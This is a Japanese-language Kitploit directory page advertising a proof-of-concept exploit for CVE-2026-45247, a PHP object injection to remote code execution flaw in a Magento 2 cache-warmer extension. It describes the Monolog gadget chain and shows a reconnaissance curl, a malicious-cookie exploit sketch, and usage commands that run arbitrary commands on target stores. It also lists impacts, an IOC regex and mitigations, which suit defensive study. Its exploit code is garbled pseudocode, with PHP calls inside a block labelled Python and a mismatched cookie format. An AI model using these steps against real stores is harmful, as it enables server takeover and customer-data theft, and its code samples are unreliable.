Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE- — PoC機能のCVE-2026-45247: Mirasvit Full Page Cache(Magento 2)における未認証のPHPオブジェクトインジェクションからRCEへ。 | Kitploit
ツール/GitHubGitHub/fevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubfevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-

PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE-

PoC機能のCVE-2026-45247: Mirasvit Full Page Cache(Magento 2)における未認証のPHPオブジェクトインジェクションからRCEへ。

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-45247 - Mirasvit Full Page Cache Warmer for Magento 2 - PHPオブジェクトインジェクション → RCE

CVE-2026-45247 CVSS CISA KEV

📋 説明

CVE-2026-45247 は、Magento 2 および Adobe Commerce 向けの Mirasvit Full Page Cache Warmer 拡張機能における重大な PHPオブジェクトインジェクション (PHP Object Injection) の脆弱性です。認証されていない攻撃者が、操作されたシリアル化された PHP オブジェクトを CacheWarmer クッキーで送信することで、リモートコード実行 (RCE) を達成できます。

この脆弱性は、PHP のネイティブ関数 unserialize() に対する無制限の呼び出しと、Magento およびその依存関係(特に Monolog)で利用可能なガジェットチェーン (gadget chains) の組み合わせに起因します。

属性値
CVECVE-2026-45247
製品Mirasvit Full Page Cache Warmer for Magento 2
影響を受けるバージョン1.11.12 未満の全バージョン
利用可能なパッチバージョン 1.11.12 (2026年5月25日)
CVSS スコア9.8 (クリティカル)
ベクターAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CISA KEV ステータスアクティブな悪用が確認済み (2026年6月3日追加)
期限2026年6月6日

🚨 攻撃メカニズム

  1. 拡張機能はすべてのストアリクエストで CacheWarmer クッキーを処理する
  2. クッキーの値がサニタイズなしで unserialize() に渡される
  3. 攻撃者は悪意のあるシリアル化 PHP オブジェクトを送信する
  4. Monolog のガジェットチェーン (SyslogUdpHandler, BufferHandler, FingersCrossedHandler) を使用して RCE を達成する
  5. コマンドはウェブサービスの権限でサーバー上で実行される

⚙️ 攻撃のフェーズ

フェーズ1: 偵察

root@kitploit:~
# Verificar si la tienda usa Mirasvit Cache Warmer
curl -s https://tienda.com/pub/media/mirasvit/cache_warmer/CHANGELOG.md

フェーズ2: 脆弱性分析

python

La cookie se procesa en cada request sin autenticación

El código vulnerable en Mirasvit:

$cookieValue = $_COOKIE['CacheWarmer']; $data = unserialize(base64_decode($cookieValue)); # ¡Peligro!

root@kitploit:~
### フェーズ3: エクスプロイトの実行
python
# Construcción de la cookie maliciosa
payload = serialize(PHPObjectInjection())
cookie_value = f"CacheWarmer:{base64_encode(payload)}"

# Envío de la petición
requests.get(target, cookies={'CacheWarmer': cookie_value})

🛠️ PoC の使用方法

インストール

root@kitploit:~
git clone https://github.com/tu-usuario/CVE-2026-45247.git
cd CVE-2026-45247
pip install requests

基本的な実行

root@kitploit:~
# Verificar vulnerabilidad
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com --check-only

# Ejecutar comando 'id'
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "id"

# Ejecutar comando personalizado
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "whoami"

# Usar proxy para depuración
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "ls -la" --proxy http://127.0.0.1:8080

クイックスクリプト

root@kitploit:~
# Verificar con script bash
chmod +x check_cve_2026_45247.sh
./check_cve_2026_45247.sh https://tienda.ejemplo.com

📊 実証された影響

  • Magento サーバーでのリモートコマンド実行 (RCE)
  • 顧客データベースと注文データへの完全なアクセス
  • 永続化のための Web シェルのインストール
  • オンラインストアの完全な侵害
  • クレジットカードデータの漏洩の可能性
  • 企業インフラストラクチャ内での水平移動

🛡️ 検出

侵害指標 (IOCs)

アクセスログ内:

root@kitploit:~
CacheWarmer: (Tz|Qz|YT)[a-zA-Z0-9+/=]+

悪用で観測されたコマンド:

root@kitploit:~
echo PWNED_CVE2026_$(date +%s)
sleep 5

使用されたガジェットチェーン:

  • Monolog\Handler\SyslogUdpHandler
  • Monolog\Handler\BufferHandler
  • Monolog\Handler\FingersCrossedHandler
  • Monolog\Handler\GroupHandler

🔧 緩和策

即時アップデート

root@kitploit:~
# Actualizar a versión parcheada
composer require mirasvit/module-cache-warmer:1.11.12
bin/magento cache:flush

一時的な緩和策

root@kitploit:~
# Bloquear cookie CacheWarmer en .htaccess o nginx
RewriteCond %{HTTP_COOKIE} CacheWarmer
RewriteRule .* - [F,L]
root@kitploit:~
// En app/code/local/Custom/BlockCookie.php
if (isset($_COOKIE['CacheWarmer'])) {
    unset($_COOKIE['CacheWarmer']);
}
ツールをダウンロード